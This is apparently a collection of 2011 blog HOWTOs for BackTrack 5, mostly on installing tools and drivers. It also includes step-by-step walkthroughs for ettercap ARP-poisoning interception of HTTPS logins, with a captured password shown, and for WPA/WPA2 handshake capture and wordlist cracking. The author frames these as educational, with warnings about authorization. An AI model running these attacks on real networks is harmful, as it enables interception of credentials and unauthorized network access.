HOWTO : Yet Another Update script for Back|Track 5

Maxfx at Back|Track Linux developed a script for updating the Back|Track 5 which is written in Python. You can update the Back|Track 5 and it's applications in one script.

The current version is 0.6 at the time of this writing.

wget http://bl4ck5w4n.tk/wp-content/uploads/2011/07/bt5up.tar

tar -vxf bt5up.tar

Usage :

./bt5up.py

You can also move the execute file to /bin or /usr/bin. Once moved the file to /bin or /usr/bin, you can run the script as the following :

bt5up.py

Source :

Yet Another Update script on Back|Track 5 forum

Remarks :

Another update script written in C

That's all! See you.

HOWTO : Register to OSVDB and Nessus on Back|Track 5

PART I : OSVDB

Go to http://osvdb.org to register your account and you will receive an email to activate your account.

After the activation your account, you can login to OSVDB. Go to "Account" -- "API" to copy the API code.

Open a terminal, issue the following command :

nano /pentest/enumeration/web/cms-explorer/osvdb.key

Copy the API code onto the osvdb.key file.

PART II : Nessus

Go to http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code and select "Using Nessus at Home?" to register.

You will receive an email. Follows the instruction on the email to open a terminal and issue the command :

/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX

To create a user :

/opt/nessus/sbin/nessus-adduser

** You can leave the rule field empty.

Start the Nessus from the menu of Back|Track 5, "BackTrack" -- "Vulnerability Assessment" -- "Vulnerability Scanners" -- "Nessus" -- "nessus start".

Or, just issue the following command :

/etc/init.d/nessusd start

After that, go to https://localhost:8834/

That's all! See you.

HOWTO : Solves the Wireshark not loading on Back|Track 5

Back|Track 5 comes with Wireshark 1.6.1 as at July 24, 2011 (GMT +8) However, it does not load properly due to missing a file namely "libwsutil.so.0".

Therefore, we need to compile the latest SVN version of Wireshark from source. The current SVN version is 1.7.0-SVN-38173 at time of this writing.

Step 1 :

Go http://www.wireshark.org/download/automated/src/ to get the latest version of the Wireshark. The latest version at the time of this writing is 1.7.0-SVN-38173.

*** Please note that the latest version as at July 25, 2011 is 1.7.0-SVN-38202.

apt-get update
apt-get install libtool flex libgtk2.0-dev lua50
apt-get install dpatch libc-ares-dev docbook-xsl libpcre3-dev libcap-dev libgnutls-dev libkrb5-dev liblua5.1-0-dev libsmi2-dev libgeoip-dev xsltproc automake1.9

Step 2 :

apt-get --purge remove wireshark

** Don't need to remove the previous wireshark. So that the menu entry can be reminded unchanged.

Step 3 :

tar -xvjf wireshark-1.7.0-SVN-<LATEST_VERSION>.tar.bz2

cd wireshark-1.7.0-SVN-<LATEST_VERSION>

Step 4 :

./autogen.sh
./configure
make debian-package

Step 5 :

cd ..

If you are installed 64-bit Back|Track 5 :

dpkg -i wireshark-common_1.7.0_amd64.deb wireshark_1.7.0_amd64.deb tshark_1.7.0_amd64.deb

OR

If you are installed 32-bit Back|Track 5 :

dpkg -i wireshark-common_1.7.0_i386.deb wireshark_1.7.0_i386.deb tshark_1.7.0_i386.deb

Step 6 :

/usr/bin/wireshark

That's all! See you.

HOWTO : Back|Track 5 on Lenovo ThinkPad X100e

Lenovo ThinkPad X100e (Type 3508-65B) is equipped with AMD Athlon Neo MV-40 CPU and Radeon Display card. It does not work properly on Back|Track 5.

This tutorial is going to show you how to install Back|Track 5 on the captioned hardware.

Step 1 :

Boot up the Live CD or Live USB. Select the first item. Press "Tab" key to add the following line to the end of the line displayed on the screen.

radeon.modset=0

Step 2 :

After the Live CD or Live USB is booting up, open terminal and then issue the following command.

nano /etc/default/grub

Locate :

GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791"

Make it read as :

GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791 radeon.modset=0"

Save and exit.

Step 3 :

update-grub
fix-splash

Step 4 :

Configure the wireless card.

HOWTO : RTL8191SE wireless card on Back|Track 4 R2

Step 5 :

Install of AMD Catalyst 11.6 Proprietary driver.

Go to AMD official site and download AMD Catalyst 11.6 Proprietary Linux x86 Display Driver which is released on June 15, 2011.

wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-6-x86.x86_64.run
chmod +x ati-driver-installer-11-6-x86.x86_64.run
./ati-driver-installer-11-6-x86.x86_64.run

** My Back|Track 5 is 64-bit so I download the 64-bit version of the driver.

Follow the instruction on the screen to install the driver. After the installation, you should reboot your system.

Before reboot your system, issue the following command :

fix-splash

Step 6 :

Install Pointing Device Settings for the TrackPoint system.

apt-get install gpointing-device-settings

Go to "System" -- "Preferences" -- "Pointing Devices".

Select "TPPS/2 IBM TrackPoint". Choose "Use middle button emulation" and "Use wheel emulation". Select "2" for the button.

That's all! See you.

HOWTO : Adobe Flash 10.3 on Back|Track 5

Step 1 :

Go to Flash official site to download current version (tar.gz). It is 10.3.181.34 at the time of this writing.

Step 2 :

Close all running Firefox.

Extract the file "install_flash_player_10_linux.tar.gz".

tar -xvzf install_flash_player_10_linux.tar.gz

Step 3 :

Move the "libflashplayer.so" to its locations.

chown root:root libflashplayer.so
chmod 0644 libflashplayer.so
mv -f libflashplayer.so /usr/lib/mozilla/plugins/
ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/

Step 4 :

Delete the extracted files and directories.

rm -R usr

Source :

Backtrack 5 - How to get flash player working on Gnome / KDE x64

That's all! See you.

HOWTO : Update script for Back|Track 5

Sickness at Back|Track Linux developed a script for updating the Back|Track 5. You can update the Back|Track 5 and it's applications in one script.

The current version is 0.6 at the time of this writing.

wget http://sickness.tor.hu/wp-content/uploads/2011/06/backtrack5_update.c
gcc -o backtrack5_update backtrack5_update.c

Usage :

./backtrack5_update

You can also move the execute file to /bin. Once moved the file to /bin, you can run the script as the following :

backtrack5_update

Source :

Update script on Back|Track 5 forum

Remarks :

Another update script written in Python

That's all! See you.

HOWTO : FeedingBottle 3.2 on Back|Track 5

FeedingBottle is a Graphic User Interface (GUI) for Aircrack-ng and it is a project of Beini. Beini is based on Tiny Core Linux which is a wireless network security testing system.

FeedingBottle can handle WEP, WPA, WPA2 as well as hidden SSID.

FeedingBottle 3.2 is working well on Back|Track 5. You can download it at here. Extact and install it by the following commands.

wget http://www.ibeini.com/beini_system/others/feedingbottle/feedingbottle3.2-backtrack5-gnome.zip
unzip feedingbottle3.2-backtrack5-gnome.zip
dpkg -i feedingbottle3.2-backtrack5-gnome.deb

After the installation, you can find it at "Applications" -- "BackTrack" -- "Exploitation Tools" -- "Wireless Exploitation Tools" -- "WLAN Exploition" -- "FeedingBottle3.2".

For the usage, please visit the official site at here.

There are simple and advanced modes for you to use.

That's all! See you.

HOWTO : The Onion Router (Tor) on Back|Track 5

PART I : Browser

Step 1 :

nano /etc/apt/sources.list

Append the following line to the file.

deb http://deb.torproject.org/torproject.org lucid main

Step 2 :

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

apt-get update
apt-get install tor tor-geoipdb
apt-get install privoxy

Step 3 :

nano /etc/privoxy/config

Append the following line :

forward-socks4a / 127.0.0.1:9050 .

/etc/init.d/privoxy start
/etc/init.d/tor start

Step 3a (Optional) :

If you are behind firewall or NAT as well as router, you should append the following line at the configure file.

forward 192.168.*.*/ .

Step 4 :

Go to the Tor official site to download and install Tor button for Firefox.

Tor Button Plugin for Firefox

Step 5 :

Open Firefox. Go to "Tools" -- "Add-ons" -- "Extensions". Select "Torbutton's Preferences".

(a) At "Proxy Settings", unclick "Use Polipo".
(b) At "Security Settings", On browser startup, set Tor state to:" select "Tor".
(c) At "Display Settings", select "Icon".

** Now, your Firefox will enable Tor on every launch unless you disabled the "Tor Button" on the Firefox.

Step 6 (Optional) :

To check if it works or not. Go to the following sites to check your Ip address.

http://cmyip.com

or

http://whatismyip.com

or

http://check.torproject.org

PART II : Console

Step a :

apt-get install proxychains elinks

Step b :

nano /etc/proxychains.conf

Append the following line :

socks4 127.0.0.1 9050

** It should be there.

Step c :

Usage :

proxychains nmap google.com
proxychains elinks http://cmyip.com
proxychains elinks http://www.whatismyip.com

To see your real IP address :

elinks cmyip.com

That's all! See you.

HOWTO : Lenovo Active Protection System (HDAPS) on Ubuntu 11.04

HDAPS can protect against your laptop (Lenovo ThinkPad) from damaging the hard drive when the laptop is moving around.

Step 1 :

sudo apt-get update
sudo apt-get install tp-smapi-dkms hdapsd

Step 2 :

echo 'tp_smapi' | sudo tee -a /etc/modules
echo 'hdapsd' | sudo tee -a /etc/modules

Step 3 :

sudo modprobe tp_smapi
sudo /etc/init.d/hdapsd restart

** You just do Step 1 to Step 3 for one time only

Step 4 :

To test if the hdapsd is working or not, you just issue one of the following commands :

(a)
sudo find /

Then, move your laptop and to see if it can halt or not.

(b)
sudo hdapsd

Then, move your laptop and to see if it display "parking" or not.

Step 5 (Optional) :

You can adjust the sensitivity of the sensor by editing the following :

sudo nano /etc/default/hdapsd

Locate "SENSITIVITY" and adjust the value.

That's all! See you.

HOWTO : Yet Another Back|Track 5 on Dell Streak 5

I wrote a tutorial for Back|Track 5 on Dell Streak 5 with StreakDroid at here. Today, I would like to show you how to use SimpleStreak instead of StreakDroid.

Why use SimpleStreak? It is because SimpleStreak uses Official ROM with StreakDroid kernel. It is less bug comparing with StreakDroid. Furthermore, SimpleStreak is faster than StreakDroid.

The current version of SimpleStreak is 1.2 at the time of this writing. You can download it at here.

PART I - INSTALLATION OF SIMPLESTREAK

Step 1 :

First of all, you should make sure you have flashed StreakMod Recovery. You can download it (MultiRecovryFlasher.v0.7.rar at the time of this writing) at here.

Step 2 :

Download SimpleStreak 1.2 at here.

Rename it to update.zip and copy it to the root directory of the SD Card of your Streak.

Step 3 :

Switch off your Streak. Long press "Vol Up" + "Vol down" and then press "Power on". Long press those keys until you see the screen is boot up to recovery mode.

Select "2. Software upgrade via Update.pkg on SD Card" by pressing "Camera button". You will see a "Dell" logo and a "!" inside a triangle. Press "Power on" to the next menu.

Press "Vol up" or "Vol down" to move the cursor. Select "wipe the cache partition" and "wipe data/factory reset" by pressing "Camera button" one by one.

After that, press "Vol up" or "Vol down" to move the cursor. Select "sdcard:update.zip" by pressing "Camera button". Then choose, "Install".

Upon seeing "Installation Completed", press "Exit" button on the Streak to return to the previous menu. Then select "reboot system now".

Wait for the Streak to reboot. The first reboot takes longer time. Please be patient.

Step 4 :

Install the following apps from the Market for the running of Back|Track 5.

(1) Android Terminal Emulator by Jack Palevich
(2) Mocha VNC Lite by MochaSoft

** Step 1 to 4, just do them ONCE.

PART II - INSTALL BACK|TRACK 5 ON DELL STREAK

Step 5 :

Download the official Back|Track 5 ARM from the official site. Extract it and copy "busybox" and "installbusybox.sh" to the root directory of the SD card.

Open the Android Terminal Emulator and then execute

su
sh installbusybox.sh

** This step is just doing ONCE unless your ROM is reflashed or updated.

Step 6 :

Since the original ARM version of Back|Track 5 cannot be copied to the SD Card due to the size of the image larger than 4GB. You should download a resized version which is developed by anantshri.

bt.7z.001
bt.7z.002
bt.7z.003

MD5SUM :
558ecb1f0e5feb1da86526df8761e6cc bt.7z.001
247842fd0d3ebb39454f76f4704d1537 bt.7z.002
f74d2f744434a7182b13287d9f8165e7 bt.7z.003

Step 7 :

Double click on "bt.7z.001" to extract. You will then see the following after the extract.

bt
bt.img
startbt
stopbt
installbt.sh

You should create a directory of "bt" (or folder) on the SD Card's root directory.

Copy these files to "/sdcard/bt".

Step 8 :

Run the following commands on the Terminal Emulator on your Streak.

su
cd /sdcard/bt
sh installbt.sh

** This step is just doing ONCE unless your ROM is reflashed or updated.

Step 9 :

Run the following commands on the Terminal Emulator on your Streak.

To start the Back|Track 5 :

su
startbt
bt

Then, you will drop to the Back|Track shell

Step 10 :

Under the Back|Track shell, run the following :

ui

** It will start the VNC server on your Streak.

Step 11 :

Press "Home" on your Streak and then run the apps "Mocha VNC Lite".

Name : BackTrack (or bt for short)
Address : localhost
Port : 5901
Password : 12345678


Then, press "Connect". You will see the Back|Track 5 launched.

** The setting of the Mocha VNC Lite will be remembered. That means you just type ONCE.

Press "Home" to go to the Streak screen. Back|Track 5 is still running.

Step 12 :

To stop the Back|Track 5, run the following command on the Back|Track shell :

killui

** Stop the VNC server.

And then, run the following command :

Exit the Terminal Emulator and then restart it.

su
stopbt

Now, the Back|Track 5 is stopped running.

Step 13 :

To launch the Back|Track next time, you should repeat the Step 9 to 11. And stop the Back|Track just repeat Step 12.

Source :

BACKTRACK 5 on Xperia X10 chroot

Streak - MultiRecoveryFlasher

The method of resize the Back|Track 5 image to 3.3GB

Remarks :

(1) Make sure you run "killui" and "stopbt" when BackTrack 5 is not required.

(2) The aircrack-ng cannot be ran properly as the interface is eth0 instead of wlan0. No monitor mode and no injection.

(3) Download MultiRecoveryFlasher at the Source above. Then, flash "StreakMod-Recovery" if you cannot flash the SimpleStreak. Under Ubuntu, you are not required to install any driver but you need to run the program in root. Go to root by the following command :

sudo -sH

That's all! See you.

Does Snort really protect your network?

Before watching the video below which is prepared by TOX1C, I always think that Snort is powerful and protective. Now, I know that Snort cannot protect your network from being hacked by skilled hackers.

Enjoy!

Pissing on Snort with Metasploit from T0X1C on Vimeo.

HOWTO : Back|Track 5 on Dell Streak 5

First of all, you should root your Dell Streak 5. I have tried many methods to root my Dell Streak 5 but unsuccess. Those methods require Windows system and some require to use an apps. I nearly to brick my Streak. Fortunately, I re-flashed the recovery image and rescued my Streak.

Now, I would like to show you how to root your Streak by mean of installation of a custom ROM - StreakDroid which is developed by DJ Steve. The current StreakDroid is 2.0.0 and based on stock ROM 2.3.3. However, this version has some bugs (please see Known Issue below). Therefore, I use the previous version 1.9.0 which is based on stock ROM 2.2.2 instead. Version 1.9.0 is more stable then 2.0.0.

Installation of custom ROM for the root is the easiest way to do so. If you do so, your Streak cannot be unrooted and the warranty will be voided. The ROM will be the StreakDroid 2.0.0 or 1.9.0 depends on your choice.

Installation of Back|Track 5 does not harm your Streak as it use VNC to load the Back|Track 5 image.

PART I - INSTALL CUSTOM ROM TO DELL STREAK

Step 1 :

Download the StreakDroid 2.0.0.
wget http://mirror2.streakdroid.com/StreakDroid5-2.0.zip

OR

Dowload the StreakDroid 1.9.0.
wget http://downloads.streakdroid.com/djsteve/update-1.9.0.zip

Rename it to update.zip and copy it to the SD card of your Streak.

Step 2 :

Switch off your Streak. Long press "Vol Up" + "Vol down" and then press "Power on". Long press those keys until you see the screen is boot up to recovery mode.

Select "2. Software upgrade via Update.pkg on SD Card" by pressing "Camera button". You will see a "Dell" logo and a "!" inside a triangle. Press "Power on" to the next menu.

Press "Vol up" or "Vol down" to move the cursor. Select "wipe the cache partition" and "wipe data/factory reset" by pressing "Camera button" one by one.

After that, press "Vol up" or "Vol down" to move the cursor. Select "sdcard:update.zip" by pressing "Camera button". Then choose, "Install".

Upon seeing "Installation Completed", press "Exit" button on the Streak to return to the previous menu. Then select "reboot system now".

Wait for the Streak to reboot. The first reboot takes longer time. Please be patient.

Step 3 (Optional) :

You can now to install the following apps from the Market.

(1) sysctl config
(2) chainfire3D
(3) Plugins for chainfire3D - (Don't extract the .zip) Installed and select nNvidia
(4) Remote Desktop by Kolakowski Damian

Step 4 :

Install the following apps from the Market for the running of Back|Track 5.

(1) Android Terminal Emulator by Jack Palevich
(2) Android-VNC-Viewer by androidVNC team + antlersoft
Or, (3) Mocha VNC Lite by MochaSoft

** Step 1 to 4, just do them ONCE.

PART II - INSTALL BACK|TRACK 5 ON DELL STREAK

Step 5 :

Since the original ARM version of Back|Track 5 cannot be copied to the SD Card due to the size of the image larger than 4GB. You should download a resized version which is developed by anantshri.

bt.7z.001
bt.7z.002
bt.7z.003

MD5SUM :
558ecb1f0e5feb1da86526df8761e6cc bt.7z.001
247842fd0d3ebb39454f76f4704d1537 bt.7z.002
f74d2f744434a7182b13287d9f8165e7 bt.7z.003

Step 6 :

Double click on "bt.7z.001" to extract. You will then see the following after the extract.

bt
bt.img
startbt
stopbt
installbt.sh

You should create a directory of "bt" (or folder) on the SD Card's root directory.

Copy these files to "/sdcard/bt".

Step 7 :

Run the following commands on the Terminal Emulator on your Streak.

su
cd /sdcard/bt
sh installbt.sh

** This step is just doing ONCE unless your ROM is reflashed or updated.

Step 8 :

Run the following commands on the Terminal Emulator on your Streak.

To start the Back|Track 5 :

startbt
bt

Then, you will drop to the Back|Track shell

Step 9 :

Under the Back|Track shell, run the following :

ui

** It will start the VNC server on your Streak.

Step 10 :

Press "Home" on your Streak and then run the apps "Android-VNC-Viewer".

Nick : BackTrack (or bt for short)
Address : localhost
Port : 5901
Password : 12345678
Color Format : 24-bit color (4 bpp)
Local mouse pointer : Enable
Force full-screen bitmap : Auto

Then, press "Connect". You will see the Back|Track 5 launched.

** The setting of the Android-VNC-Viewer will be remembered. That means you just type ONCE.

Press "Home" to go to the Streak screen. Back|Track 5 is still running.

Step 11 :

To stop the Back|Track 5, run the following command on the Back|Track shell :

killui

** Stop the VNC server.

And then, run the following command :

Exit the Terminal Emulator and then restart it.

stopbt

Now, the Back|Track 5 is stopped running.

Step 12 :

To launch the Back|Track next time, you should repeat the Step 8 to 10. And stop the Back|Track just repeat Step 11.

Source :

xda developers - Dell Streak

BACKTRACK 5 on Xperia X10 chroot

HOWTO : Root the Dell Streak (Updated 2010-Dec-13) -- at your own risk

Streak - MultiRecoveryFlasher

The method of resize the Back|Track 5 image to 3.3GB

Known issues :

StreakDroid 2.0.0 -
Since Dell Streak will reboot or reset itself on every an hour or 1.5 hours, please install an apps namely "Super Task Killer" by OPDA Team and make it runs automatically when the Streak start up. Set it to kill the background apps on every half an hour interval. That MAY solve the problem as mentioned.

StreakDroid 1.9.0 -
The Android keyboard is malfunction but use Swype instead.

Remarks :

(1) Make sure you run "killui" and "stopbt" when BackTrack 5 is not required.

(2) The aircrack-ng cannot be ran properly as the interface is eth0 instead of wlan0. No monitor mode and no injection.

(3) SecManiac.com stated that an apps namely "ASTRO file manager" can extract the BackTrack 5 ARM image to the SD card that in fat32 format flawlessly. However, it does not test by me.

(4) Download MultiRecoveryFlasher at the Source above. Then, flash "StreakMod-Recovery" if you cannot flash the StreakDroid. Under Ubuntu, you are not required to install any driver but you need to run the program in root. Go to root by the following command :

sudo -sH

That's all! See you.

HOWTO : nVidia CUDA Toolkit 4.0 on Ubuntu 11.04 Server

The CUDA Toolkit 4.0 is released on May 2011. If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA Toolkit 4.0 on Ubuntu 11.04 Server.

You will experience a more faster server after the installation of CUDA Toolkit 4.0.

This HOWTO does not require to install X.

Step 1 :

Add the CUDA 4.0 PPA.
sudo add-apt-repository ppa:aaron-haviland/cuda-4.0

Thanks for the developer of CUDA 4.0 PPA - Aaron Haviland of his contribution to make CUDA Toolkit to be installed easily.

Step 2 :

sudo apt-get update
sudo apt-get upgrade

64-bit :
sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

32-bit :
sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

Step 3 :

sudo nano /etc/init.d/nvidia_cuda

Append the following lines.

============= Copy from here ================
#!/bin/bash

PATH=/sbin:/bin:/usr/bin:$PATH

/sbin/modprobe nvidia

if [ "$?" -eq 0 ]; then

   # Count the number of NVIDIA controllers found.
   N3D=`/usr/bin/lspci | grep -i NVIDIA | grep "3D controller" | wc -l`
   NVGA=`/usr/bin/lspci | grep -i NVIDIA | grep "VGA compatible controller" | wc -l`

   N=`expr $N3D + $NVGA - 1`
   for i in `seq 0 $N`; do
      /bin/mknod -m 666 /dev/nvidia$i c 195 $i;
   done

   /bin/mknod -m 666 /dev/nvidiactl c 195 255

else
   exit 1
fi

=========== Copy to here =================

Step 4 :

sudo chmod +x /etc/init.d/nvidia_cuda
sudo update-rc.d nvidia_cuda defaults

Step 5 :

Reboot your system.

Remarks

I do not have nVidia display cards server in hand at the moment, I am not sure the captioned startup script working properly or not.

That's all! See you.

HOWTO : nVidia CUDA Toolkit 4.0 on Ubuntu 11.04 Desktop

The CUDA Toolkit 4.0 is released on May 2011. If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA Toolkit 4.0 on Ubuntu 11.04 Desktop.

You will experience a more faster desktop after the installation of CUDA Toolkit 4.0. Meanwhile, if you installed SMPlayer, you can playback 1080p videos with the help of vdpau.

Step 1 :

Add the CUDA 4.0 PPA.
sudo add-apt-repository ppa:aaron-haviland/cuda-4.0

Thanks for the developer of CUDA 4.0 PPA - Aaron Haviland of his contribution to make CUDA Toolkit to be installed easily.

Step 2 :

sudo apt-get update
sudo apt-get upgrade

64-bit :
sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

32-bit :
sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

Step 2a (Optional) :

If you do not have any nVidia driver installed before or you encounter any problem of booting up your system, you need to do the following command. Otherwise, this step is not required at all.

sudo nvidia-xconfig

**This step may not be required.

Step 3 :

Reboot your system.

Step 4 (Optional) :

To install SMPlayer.

sudo apt-get install smplayer smplayer-translations smplayer-themes

Then set it to use "vdpau" at "Output Driver" at "Preference".

Step 5 (Optional) :

Once installed the CUDA Toolkit and nVidia drivers, you can download the sample codes for testing.

sudo apt-get install freeglut3-dev libxi-dev libXmu-dev

wget http://developer.download.nvidia.com/compute/cuda/4_0/sdk/gpucomputingsdk_4.0.17_linux.run

sudo chmod +x gpucomputingsdk_4.0.17_linux.run
./gpucomputingsdk_4.0.17_linux.run

Accept the default settings.

cd NVIDIA_GPU_computing_SDK/C
make

** Please ignore the warning messages for unsupported gcc version. That is no harm at all.

Run the sample codes.

cd NVIDIA_GPU_computing_SDK/C/bin/linux/release
./deviceQuery
./nbody

That's all! See you.

HOWTO : Sniffing SSL with ettercap on Back|Track 5

*** WARNING : This HOWTO is for educational only. Do NOT carry out the following steps on a LAN that without permission. Otherwise, you will be put into the jail. ***

Sniffing SSL (https) traffic on LAN with ettercap by mean of Man In The Middle (MITM) attack.

Step 1 :

nano /etc/etter.conf

Make the change as the following :

[privs]
ec_uid = 0    # nobody is the default
ec_gid = 0    # nobody is the default

Uncomment the following :

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Step 2 :

Victim's machine is at 192.168.1.100 while the router is at 192.168.1.1. Attacker is at 192.168.1.115.

ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/

The outcome of the display is as the following :

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 72)
Listening on eth0... (Ethernet)

eth0 ->    08:00:27:FF:95:DB    192.168.1.115 255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |=================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A

GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Step 3 :

At the victim's machine, open a browser, such as Firefox and go to GMail. You will be asked to accept an untrusted certification. Just accept the certificate and you will be directed to the login screen of GMail.

When the victim login to the GMail, his/her username and password will be logged on the Attacker's machine. The display will be similar to the following :

HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s

You will find that USER: samiux and PASS: password.

Remarks :

To delete the untrusted certificate on Firefox at victim's machine : "Edit" -- "Perference" -- "View Certificate List" -- "Server". You will find something like the following. You just delete them all.

Thawte Consulting (Pty) Ltd.
www.google.com www.google.com:443 forever 2011-09-21
www.google.com mail.google.com:443 forever 2011-09-21

In general, GMail will not ask you to accept any certificate, especially untrusted one.

That's all! See you.

HOWTO : Back|Track 5 on VirtualBox 4.0.8

(A) Install Back|Track 5 on VirtualBox

Install VirtualBox 4.0.8 on the host computer, such as Ubuntu 11.04 as usual. Then install Back|Track 5 on the VirtualBox. Next is to install Oracle VM VirtualBox Extension Pack and Guest Additons.

Oracle VM VirtualBox Extension Pack is installed on the host computer, such as Ubuntu 11.04. You can find it on the Download page.

To install Guest Additons, just click "Devices" -- "Install Guest Additions" on the menu.

Do the following on the guest computer (Back|Track 5) :

cd /media/VBOXADDITONS_4.0.8_71778
./VBoxLinuxAddtions.run

To fix the boot up screen.

fix-splash

Do the following on the host computer (Ubuntu 11.04) :

Add you (username) to the group of vboxusers, e.g. samiux as username.

useradd -G vboxusers samiux

Go to "Users and Groups", "Advanced Settings" -- "User's Rights" select "Use VirtualBox solution".

Then, reboot your host to make it effective.

Remember not to enable USB 2.0 on the VirtualBox as some USB dongles do not work properly when it is enabled.

Finally, the following wireless USB dongles have been tested and they are all working perfectly out of the box. They are all support injection too.

TP-Link TL-WN321G 54Mbps Wireless G USB Adapter
TP-Link TL-WN821N 300Mbps Wireless N USB Adapter
TP-Link TL-WN822N 300Mbps High Gain Wireless N USB Adapter

*** This tutorial is also applied to VirtualBox 4.1.2.

Remarks :

When the kernel of Back|Track 5 is upgraded, the Guest Additions will be damaged. You need to do the following on Back|Track 5 and then reinstall the Guest Additions :

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/

(B) Create Metasploitable virtual machine (Optional)

Go to the following link to download the "Metasploitable" which is an Ubuntu 8.04 server with some flaws.

http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Set the downloaded Metasploitable as virtual hard drive at VirtualBox. The network adapter is set to "Host-Only". The virtual hard disk space is at least 8GB and 512MB RAM for the Metasploitable.

(C) The VirtualBox intranet

Now, the IP address of eth0 of Metasploitable is similar to 192.168.56.101. The IP address of eth0 and eth1 of Back|Track are similar to 10.0.2.15 and 192.168.56.102 respectively.

You may require to execute the following command at Back|Track in order to see the two network interfaces and their IPs.

/etc/init.d/networking restart

Back|Track can access (or ping) Metasploitable via IP address. Back|Track can surf the internet but Metasploitable cannot.

At last, your penetration environment is set up.

(D) Free Tutorials

(1) Metaploit Unleashed
(2) Fast-Track
(3) Social-Engineer Tootkit
(4) Got Milk?
(5) How to Metasploit Beginner to Advanced (Video)
(6) SecurityTube.net (Video)
(7) BackTrack WiKi

(E) Non-free Training

Offensive Security

(F) Resources

(1) Exploits Database
(2) Metaploit Blog
(3) Offensive security Blog
(4) Yet another Back|Track in Gnome
(5) Metasploit
(6) Google Hacking-Database
(7) BackBox Linux

You may find the following links useful :

HOWTO : Bug fix for Back|Track 5

HOWTO : WEP cracking with Back|Track 5

HOWTO : WPA/WPA2 cracking with Back|Track 5

HOWTO : No skill hacking with Armitage on Back|Track 4 R2

HOWTO : Sniffing SSL with ettercap on Back|Track 5

HOWTO : The Onion Router (Tor) on Back|Track 5

HOWTO : FeedingBottle 3.2 on Back|Track 5

HOWTO : Update script for Back|Track 5

HOWTO : Yet Another Update script for Back|Track 5

HOWTO : Yet Another Back|Track 5 on Dell Streak 5

HOWTO : RTL8191SE wireless card on Back|Track 4 R2

HOWTO : Adobe Flash 10.3 on Back|Track 5

HOWTO : Back|Track 5 on Lenovo ThinkPad X100e

Does Snort really protect your network?

HOWTO : Solves the Wireshark not loading on Back|Track 5

HOWTO : Register to OSVDB and Nessus on Back|Track 5

HOWTO : Anonymous in chat.freenode.net with XChat

HOWTO : Pure-ftpd and atftpd on Back|Track 5

HOWTO : SSH Tunneling - Remote Port Forwarding

HOWTO : Penetration Testing in the Real World

g0tmi1k's Video Series

That's all! See you.

HOWTO : WPA/WPA2 cracking with Back|Track 5

Don't crack any wifi router without authorization; otherwise, you will be put into the jail.

(A) General Display card

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
